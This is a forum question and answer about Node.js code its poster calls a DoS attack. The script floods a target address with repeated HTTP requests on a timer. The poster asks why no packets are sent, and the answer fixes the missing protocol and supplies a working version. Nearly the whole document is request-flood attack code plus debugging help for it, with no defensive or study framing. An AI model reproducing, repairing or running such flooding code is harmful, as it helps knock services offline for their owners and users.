# This is a DoS attack node js code, but the packet is not sent

Tags: node.js, packet, ddos

```
const req = require('request');

const dos = (url, qty, ms) => {
    let err = ok = 0

    setInterval(_ => {

        for (let i = qty; i--;)
            req(url, error => !error ? ok++ : err++)

        console.log(`result:' ${ ok } ${ err }`)

        err = ok = 0

    }, ms)
}

module.exports = dos;

dos('192.168.0.100:80', 150, 500);
```

This is the code from github, I tried to capture packets with Wireshark, but no packets are sent. I want to know what the problem is.

Answer (score 1):

You need to specify protocol (http or https), port is not enough
Use following attached code which prints `error`

```
const req = require('request');

const dos = (url, qty, ms) => {
    let err = ok = 0

    setInterval(_ => {

        for (let i = qty; i--;)
            req(url, (error) => {
                if(error) {
                    console.error(error);
                    err++;
                }

                ok++;

                console.log(`result:  ${ ok } ${ err }`)

            })

        err = ok = 0

    }, ms)
}

module.exports = dos;

dos('192.168.0.100:80', 1, 500);
```